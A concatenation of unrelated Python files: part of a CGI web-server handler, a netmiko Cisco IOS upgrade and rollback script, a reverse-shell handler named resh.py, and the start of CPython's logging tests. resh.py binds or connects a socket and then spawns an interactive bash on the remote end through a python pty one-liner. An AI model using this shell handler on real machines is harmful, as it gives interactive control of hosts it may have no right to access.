def _send_output(self, output):
# #
'''Sends the final given output to client.'''
if not (
output is None or __test_mode__ or self.type == 'head'
):
if self._encoded_output:
self.wfile.write(self._encoded_output)
# # python3.5
# # elif builtins.isinstance(output, builtins.bytes):
elif builtins.isinstance(output, builtins.str):
# #
self.wfile.write(output)
# # python3.5 elif builtins.isinstance(output, builtins.str):
elif builtins.isinstance(output, builtins.unicode):
self.wfile.write(output.encode(self.server.web.encoding))
else:
self.copyfile(output, self.wfile)
output.close()
return self
@JointPoint
# # python3.5
# # def _gzip(
# # self: Self, content: (builtins.str, builtins.bytes)
# # ) -> builtins.bytes:
def _gzip(self, content):
# #
'''
Compresses the given content and returns the encoded result.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> isinstance(handler._gzip(''), bytes)
True
>>> isinstance(handler._gzip(bytes()), bytes)
True
'''
# # python3.5 output = io.BytesIO()
output = StringIO.StringIO()
gzip_file_handler = gzip.GzipFile(
fileobj=output, mode='w', compresslevel=5)
if builtins.isinstance(content, builtins.bytes):
gzip_file_handler.write(content)
else:
gzip_file_handler.write(content.encode(
encoding=self.server.web.encoding))
gzip_file_handler.close()
return output.getvalue()
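# NOTE: On python3 the compression above is roughly equivalent to the
# standard library helper "gzip.compress" (a sketch only, not used by
# this module):
#
#     import gzip
#     compressed = gzip.compress('content'.encode('utf_8'), compresslevel=5)
#     assert gzip.decompress(compressed) == b'content'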
@JointPoint
# # python3.5 def _dynamic_get(self: Self) -> Self:
def _dynamic_get(self):
'''
Handles a dynamic file or python module request. It initializes \
the given script file or python module environment and decides \
whether to run it in its own thread or not. If no response is \
expected by the client it can be run without its own thread \
environment.
'''
# # python3.5
# # self.request_arguments = (
# # ('header', builtins.str(self.headers)), ('type', self.type),
# # ('handler', self),
# # ('requestedFileName', self.requested_file_name),
# # ('host', self.host), ('uri', self.uri), ('get', self.get),
# # ('externalURI', self.external_uri), ('data', self.data),
# # ('cookie', self.cookie), ('externalType', self.external_type),
# # ('sharedData', self.server.web.shared_data))
self.request_arguments = (
('header', convert_to_unicode(self.headers)),
('type', self.type), ('handler', self),
('requestedFileName', self.requested_file_name),
('host', self.host), ('uri', self.uri), ('get', self.get),
('externalURI', self.external_uri), ('data', self.data),
('cookie', self.cookie), ('externalType', self.external_type),
('sharedData', self.server.web.shared_data))
# #
if '__no_respond__' not in self.data:
self.respond = True
return self._run_request()
self.__class__.last_running_worker = threading.Thread(
target=self._run_request)
self.__class__.last_running_worker.start()
return self
@JointPoint
# # python3.5 def _run_request(self: Self) -> Self:
def _run_request(self):
'''
Decides to run the given script as python-module or standalone \
script-file.
'''
if self.load_module:
return self._run_requested_module()
return self._run_requested_file()
@JointPoint
# # python3.5 def _run_requested_file(self: Self, debug=False) -> Self:
def _run_requested_file(self, debug=False):
'''
Runs a given external process in a subprocess. Output and errors \
are piped to the requesting client.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.requested_file = FileHandler(
... __test_folder__.path + '_run_requested_file')
>>> handler.requested_file.content = ''
>>> handler.request_arguments = ('hans', 'peter'),
>>> handler.respond = False
>>> handler._run_requested_file() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.request_arguments = ('hans', 'peter'),
>>> handler._run_requested_file(True) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
# # python3.5
# # self.request_arguments = builtins.list(builtins.map(
# # lambda element: builtins.str(
# # element[1]
# # ), self.request_arguments))
self.request_arguments = builtins.list(builtins.map(
lambda element: convert_to_unicode(element[1]),
self.request_arguments))
# #
self.request_arguments[0] = self.server.web.root.path + \
self.request_arguments[0][1]
__logger__.debug('Execute file "%s".', self.request_arguments[0])
self.server.web.number_of_running_threads += 1
try:
output, errors = subprocess.Popen(
self.request_arguments, stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()
except builtins.OSError as exception:
output = ''
# # python3.5
# # errors = '%s: %s' % (
# # exception.__class__.__name__, builtins.str(exception))
errors = '%s: %s' % (
exception.__class__.__name__, convert_to_unicode(
exception))
# #
self.server.web.number_of_running_threads -= 1
size = builtins.len(output)
# # python3.5
# # if not builtins.isinstance(errors, builtins.str):
if not builtins.isinstance(errors, builtins.unicode):
# #
errors = errors.decode(
encoding=self.server.web.encoding, errors='strict')
if self.respond:
if errors:
program_description = ''
if(sys.flags.debug or __logger__.isEnabledFor(logging.DEBUG) or
debug):
program_description = ' "%s"' % self.request_arguments[0]
self.send_error(
500, 'Internal server error with cgi program%s: "%s"' % (
program_description,
regularExpression.compile('\n+').sub('\n', errors)))
else:
'''Check if given output contains a header.'''
header_match = regularExpression.compile(
'[A-Z0-9]+/([0-9]+\.)+[0-9]+ [0-9]{3} [a-zA-Z ]+\n'
'([^:]+: .+\n)+\n.+'
).match(output.decode(encoding=self.server.web.encoding))
if not header_match:
self.send_content_type_header().send_content_length_header(
size, dynamic_output=output
).end_headers()
self._send_output(output)
if errors:
__logger__.critical(
'Error in common gateway interface program "%s": %s',
self.request_arguments[0], errors)
return self
@JointPoint
# # python3.5 def _run_requested_module(self: Self) -> Self:
def _run_requested_module(self):
'''
Imports and runs a given python module. Errors and output are \
piped to the requesting client.
'''
self.request_arguments = builtins.dict(self.request_arguments)
'''Redirect output buffer.'''
print_default_buffer_backup = Print.default_buffer
Print.default_buffer = self.server.web.thread_buffer
# # python3.5 sys_path_backup = sys.path.copy()
sys_path_backup = copy(sys.path)
sys.path = [self.server.web.root.path] + sys.path
self.server.web.number_of_running_threads += 1
requested_module = builtins.__import__(
self.request_arguments['requestedFileName'])
'''Extend requested scope with request dependent globals.'''
requested_module.__request_arguments__ = self.request_arguments
sys.path = sys_path_backup
__logger__.debug('Run module "%s".', requested_module)
return self._handle_module_running(
requested_module, print_default_buffer_backup, sys_path_backup)
@JointPoint
# # python3.5
# # def _handle_module_running(
# # self: Self, requested_module: ModuleType,
# # print_default_buffer_backup: builtins.object,
# # sys_path_backup: NativeIterable
# # ) -> Self:
def _handle_module_running(
self, requested_module, print_default_buffer_backup,
sys_path_backup
):
# #
'''Handles exceptions raised in requested modules.'''
try:
if not __test_mode__:
Module.determine_caller(
callable_objects=Module.get_defined_callables(
object=requested_module)
)[1]()
except builtins.BaseException as exception:
self._handle_module_exception(requested_module, exception)
else:
if self.respond:
self.send_content_type_header().send_content_length_header(
size=builtins.len(self.server.web.thread_buffer.content),
dynamic_output=self.server.web.thread_buffer.content
).end_headers()
finally:
self.server.web.number_of_running_threads -= 1
if self.respond:
self._send_output(
output=self.server.web.thread_buffer.clear())
Print.default_buffer = print_default_buffer_backup
return self
@JointPoint
# # python3.5
# # def _handle_module_exception(
# # self: Self, requested_module: ModuleType,
# # exception: builtins.BaseException, debug=False
# # ) -> Self:
def _handle_module_exception(
self, requested_module, exception, debug=False
):
# #
'''
This method handles each exception raised by running a module \
which was requested by the client.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> try:
... raise OSError('hans')
... except OSError as exception:
... handler._handle_module_exception(
... __import__('doctest'), exception, True)
Traceback (most recent call last):
...
OSError: hans
>>> handler.respond = True
>>> try:
... raise OSError('hans')
... except BaseException as exception:
... handler._handle_module_exception(
... __import__('doctest'), exception, True)
Traceback (most recent call last):
...
OSError: hans
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> try:
... raise OSError('hans')
... except BaseException as exception:
... handler._handle_module_exception(
... __import__('doctest'), exception
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'... - ...CRITICAL... - Error in module "doctest" OSError: hans...'
'''
if self.respond:
if(sys.flags.debug or __logger__.isEnabledFor(logging.DEBUG) or
debug):
# # python3.5
# # self.send_error(
# # 500, '%s: %s\n\nRequest informations:\n\n%s' % (
# # exception.__class__.__name__,
# # regularExpression.compile('\n+').sub(
# # '\n', builtins.str(exception)
# # ), json.dumps(
# # self.request_arguments, skipkeys=True,
# # ensure_ascii=False, check_circular=True,
# # allow_nan=True, indent=4,
# # separators=(',', ': '), sort_keys=True,
# # default=lambda object: '__not_serializable__'))
# # )
self.send_error(
500, '%s: %s\n\nRequest informations:\n\n%s' % (
exception.__class__.__name__,
regularExpression.compile('\n+').sub(
'\n', convert_to_unicode(exception)
), json.dumps(
self.request_arguments, skipkeys=True,
ensure_ascii=False, check_circular=True,
allow_nan=True, indent=4,
separators=(',', ': '), sort_keys=True,
default=lambda object: '__not_serializable__')))
# #
else:
self.send_error(500, 'Internal server error')
if sys.flags.debug or __logger__.isEnabledFor(logging.DEBUG) or debug:
raise
else:
# # python3.5
# # __logger__.critical(
# # 'Error in module "%s" %s: %s\n\nRequest informations:\n\n'
# # '%s', requested_module.__name__,
# # exception.__class__.__name__, builtins.str(exception),
# # json.dumps(
# # self.request_arguments, skipkeys=True,
# # ensure_ascii=False, check_circular=True,
# # allow_nan=True, indent=4, separators=(',', ': '),
# # sort_keys=True,
# # default=lambda object: '__not_serializable__'))
# TODO do it on every error handler and in html response.
__logger__.critical(
'Error in module "%s" %s: %s\n\nRequest informations:\n\n'
'%s', requested_module.__name__,
exception.__class__.__name__, convert_to_unicode(
exception
), json.dumps(
self.request_arguments, skipkeys=True,
ensure_ascii=False, check_circular=True,
allow_nan=True, indent=4, separators=(',', ': '),
sort_keys=True,
default=lambda object: '__not_serializable__'))
# #
return self
# # endregion
# endregion
# endregion
# region footer
'''
Preset some variables given by introspection letting the linter know what \
global variables are available.
'''
__logger__ = __exception__ = __module_name__ = __file_path__ = \
__test_mode__ = __test_buffer__ = __test_folder__ = __test_globals__ = None
'''
Extends this module with some magic environment variables to provide \
better introspection support. A generic command line interface for some \
code preprocessing tools is provided by default.
'''
Module.default(
name=__name__, frame=inspect.currentframe(), default_caller=Web.__name__)
# endregion
# region vim modline
# vim: set tabstop=4 shiftwidth=4 expandtab:
# vim: foldmethod=marker foldmarker=region,endregion:
# endregion
|
actions.py
|
import netmiko
from getpass import getpass
from netmiko import file_transfer
from netmiko.ssh_exception import NetMikoTimeoutException
from netmiko.ssh_exception import NetMikoAuthenticationException
from netmiko import SCPConn
import string
from threading import Thread
import pathlib
from common import common
import re
directory = pathlib.Path(__file__).parent.absolute()
mute = 'python3 /opt/nsgbin/nsg.py mute store_'
unmute = 'python3 /opt/nsgbin/nsg.py unmute store_'
def list_model(creds, nodes):
'''
Lists models of the device or at a particular site.
@args:
- creds: username and password
- nodes: a list of devices
'''
try:
print('Hostname \t Model')
for node in nodes:
connection, cisco = common.find_type(node, creds)
if connection:
ssh_session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(ssh_session, cisco = cisco)
print(f'{node} \t {model}')
ssh_session.disconnect()
except Exception as e:
common.log(f'{node} - exception in list_model: {e}')
print(f'{node} - exception in list_model : {e}')
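# NOTE: A hedged usage sketch for the actions in this file; the
# credential dictionary and the node names are assumptions based on how
# they are handed to common.find_type() and are not defined here:
#
# if __name__ == '__main__':
#     creds = {'username': 'admin', 'password': getpass()}
#     nodes = ['store_01-cs01', 'store_01-rt01']
#     list_model(creds, nodes)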
def upload(creds, nodes, config, running_configs):
'''
Uploads IOS file(s) to the device or a particular site.
@args:
- creds: username and password
- nodes: a list of devices
- config: file with devices' models and images
'''
try:
# print(f'Nodes i get {nodes}')
for node in nodes :
connection, cisco = common.find_type(node, creds)
##SAVE RUNING CONFIG
print(f'node is : {node}')
run_file = connection['ip'] + "-running-config.txt"
print(f'\nSaving running config into file: {running_configs}/{run_file} \n')
common.archive_run(connection, f'{running_configs}/{run_file}')
common.log(f'{node} - Saving running config into file: {running_configs}/{run_file}')
session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(session, cisco = cisco)
threads = []
print(f'node just before the if condition {node}')
if node is not None:
# print('the if Condition is failing')
# ssh_session = netmiko.ConnectHandler(**connection)
print(f'config under the upload {model}')
if model in config:
th = Thread(target = common.upload_ios_file, args = (connection, config, model))
threads.append(th)
else:
common.log(f'{node} - Please add {model} model to config.json ')
print(f'{node} - Please add {model} model to config.json')
for th in threads:
th.start()
for th in threads:
th.join()
except Exception as e:
common.log(f'{node} - exception : {e}')
print(f'{node} - exception in upload under actions : {e}')
def upgrade_ios(creds, nodes, config):
'''
Upgrades the IOS image on the device or at a particular site.
@args:
- creds: username and password
- nodes: a list of devices
- config: file with devices' models and images
'''
try:
print(nodes)
for node in nodes:
connection, cisco = common.find_type(node, creds)
# node = connection['ip']
# print(connection)
session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(session, cisco = cisco)
image = config[model]['image']
md5 = config[model]['md5']
# print(md5)
# is_device_up = common.waiting_for_device(node, creds)
common.log(f'{node} - is upgrading to IOS : {image}')
print(f'{node} - is upgrading to IOS : {image}')
verify_md5 = common.verify_md5(session, image, md5, node)
if verify_md5 == True:
##TODO: uncomment when ready to boot
common.log(f'{node} - md5 validated successfully!')
print(f'{node} - md5 validated successfully!')
boot = input(f"\n{node} - proceed with changing boot ? (y/n): ")
common.log(boot)
# response = subprocess.check_output([f"{mute}, f'{node}'])
# print(response)
if boot == 'y':
common.set_boot(session, image, node)
if 'cs' in node:
bootvar = session.send_command('show boot')
else:
bootvar = session.send_command('show bootvar')
# print(bootvar)
print(f'{node} - Performing pre checks ')
common.pre_post_reload_check(node, creds)
common.log(f'\n{node} - {bootvar}')
accept_reload = input("\n\nSuccess! - proceed with reload ? (y/n): ")
common.log(f'\n{node} - {accept_reload}')
if accept_reload == 'y':
try:
##TODO: uncomment when ready to reload
print('Reloading now\n ')
common.reload(session, node)
# is_device_up = common.waiting_for_device(node, creds)
# sleep(10)
common.waiting_for_device(node, creds)
print('reloading completed')
except Exception as e:
common.log(f'{node} - unable to reload {e} ...')
print(f'{node} - unable to reload {e} ... ')
else:
common.log(f'{node} - Aborting reload')
print(f'\n{node} - Aborting reload !!!\n\n')
else:
common.log(f'{node} - Error verifying md5 checksum on device, quitting !!!')
print(f'\n\n{node} - Error verifying md5 checksum on device, quitting !!!\n\n')
session.disconnect()
except Exception as e:
common.log(f'{node} - upgrade_ios() Error -> {str(e)}')
print(f'{node} - exception in upgrade_ios : {e}')
def rollback(creds, nodes, config):
'''
Rolls back to the old image version on the device.
@args:
- creds: username and password
- nodes: a list of devices
- config: file with devices' models and images
'''
# print(f'old images under rollback {img}')
try:
for node in nodes:
connection, cisco = common.find_type(node, creds)
session = netmiko.ConnectHandler(**connection)
model = common.get_interface_by_model(session, cisco = cisco)
# image = config[model]['image']
print(f'Hostname i have {node}')
image = config[model]['image']
regex = image.split('-')[0]
lines = session.send_command(f'dir | inc {regex}').split('\n')
for line in lines:
## retrieving old image
if image not in line:
img = re.findall(r'' + regex + '.*', line)[0]
print(f'Rollback to {img} for {node}')
##TODO: uncomment when ready to boot
common.set_boot(session, img, node)
if 'cs' in node:
bootvar = session.send_command('show boot')
else:
bootvar = session.send_command('show bootvar')
print(bootvar)
reload_3 = input("\n\nSuccess! - proceed with reload ? (y/n) ... ")
if reload_3 == 'y':
try:
##TODO: umcomment when ready to reload
# reload(session)
print("Reloading ... ")
except:
print("NOT Reloading ... ")
# with open(f"/home/few7/device-ios-upgrade/run_conf/{node}-running-config.txt") as fo:
# for line in fo:
# # print(f'Im inside the while {line}')
# if img in line:
# ##UNCOMMENT ONES READY
# common.set_boot(session ,img, hostname)
# common.reload(session)
# ##COMMENT OUT LATER
# print(f' The line which has the image :{img} is {line}')
except Exception as e:
common.log(f'{node} - rollback() Error -> {str(e)}')
print(f'{node} - Exception in rollback {e}')
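# NOTE: A hedged sketch of the intended end to end workflow (upload the
# image, upgrade, roll back only if the new image misbehaves). The
# "config" structure mirrors the config.json layout implied by
# upgrade_ios() (model -> image/md5) and every concrete value below is
# a placeholder:
#
# config = {'WS-C3850-24T': {'image': 'cat3k_caa-universalk9.16.12.04.SPA.bin',
#                            'md5': '0123456789abcdef0123456789abcdef'}}
# upload(creds, nodes, config, running_configs='/tmp/run_conf')
# upgrade_ios(creds, nodes, config)
# # rollback(creds, nodes, config)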
|
resh.py
|
#!/usr/bin/python3
import os
import socket
import sys
import termios
import threading
import tty
import time
def setTTY():
fd = sys.stdin.fileno()
oldSet = termios.tcgetattr(fd)
# os.system('stty raw -echo')
tty.setraw(0)
return fd, oldSet
def resetTTY(fd, oldSet):
termios.tcsetattr(fd, termios.TCSADRAIN, oldSet)
def recvLoop(sock):
while True:
try:
data = sock.recv(10000000)
except OSError:
break
except Exception as e:
print(e)
break
if data == b'' or data is None:
break
data = data.decode(errors='ignore')
cprint(data)
sock.close()
def cprint(data):
print(data, end='', flush=True)
def connect(host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
return sock
def bind(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', port))
sock.listen(1)
client, addr = sock.accept()
print('{} <= {}'.format(client.getsockname()[0], addr[0]))
return sock, client
def rc(sock):
rc_path = os.path.expanduser('~') + '/.reshrc'
if os.path.exists(rc_path):
with open(rc_path, 'rb') as fd:
sock.send(fd.read())
def generateCmdRow():
size = os.get_terminal_size()
return 'stty rows {} columns {}\n'.format(size.lines, size.columns).encode()
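# NOTE: generateCmdRow() mirrors the local terminal size to the remote
# pty; for an 80x24 terminal it would produce (sketch):
#
#     b'stty rows 24 columns 80\n'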
def choice():
cprint('\r\n')
cprint('(1) Exit\r\n')
cprint('(2) Resize Terminal\r\n')
cprint('(3) Reload Reshrc\r\n')
cprint('(4) Get IP\r\n')
cprint('> ')
chc = sys.stdin.read(1)
if chc == '1':
sock.send(b'exit\n')
elif chc == '2':
sock.send(generateCmdRow())
elif chc == '3':
rc(sock)
sock.send(b'\n')
elif chc == '4':
print(sock.getsockname()[0], end='\r\n')
sock.send(b'\n')
else:
sock.send(b'\n')
return chc
print('''
██████╗░███████╗░██████╗██╗░░██╗
██╔══██╗██╔════╝██╔════╝██║░░██║
██████╔╝█████╗░░╚█████╗░███████║
██╔══██╗██╔══╝░░░╚═══██╗██╔══██║
██║░░██║███████╗██████╔╝██║░░██║
╚═╝░░╚═╝╚══════╝╚═════╝░╚═╝░░╚═╝
''')
serv = None
if len(sys.argv) == 2:
    serv, sock = bind(int(sys.argv[1]))
elif len(sys.argv) == 3:
sock = connect(sys.argv[1], int(sys.argv[2]))
else:
print('''Usage:
Client: resh [IP] [PORT]
Server: resh [PORT]''')
exit(1)
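# Upgrade the raw connection to an interactive session: set a sane TERM and
# spawn a proper PTY on the remote side so line editing and ncurses tools work.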
sock.send(b'export TERM=xterm\n')
sock.send(b'python3 -c \'import pty;pty.spawn("/bin/bash")\'\n')
cprint('\r\n')
fd, oldSet = setTTY()
thr = threading.Thread(target=recvLoop, args=(sock,))
thr.start()
time.sleep(1)
sock.send(generateCmdRow())
rc(sock)
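# Main key loop: '\r' is sent as '\n', the '²'/'Ω' keys send 'exit' and quit,
# and Ctrl+S ('\x13') opens the local control menu (exit / resize / reload
# ~/.reshrc / show IP) implemented in choice().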
while True:
c = sys.stdin.read(1)
if c == '\r':
c = '\n'
elif c == '²' or c == 'Ω':
sock.send(b'exit\n')
break
elif c == '\x13': # Ctrl+s
chc = choice()
if chc == '1':
break
c = ''
try:
sock.send(c.encode())
except BrokenPipeError:
break
except OSError:
print('\r\nOSError: Close ReSH\r')
break
except Exception as e:
print(e)
resetTTY(fd, oldSet)
sock.close()
if serv:
    serv.close()
thr.join()
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
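        # Snapshot the module-level logging state (handlers, level names and
        # the logger dict) under the logging lock so tearDown() can restore it.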
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
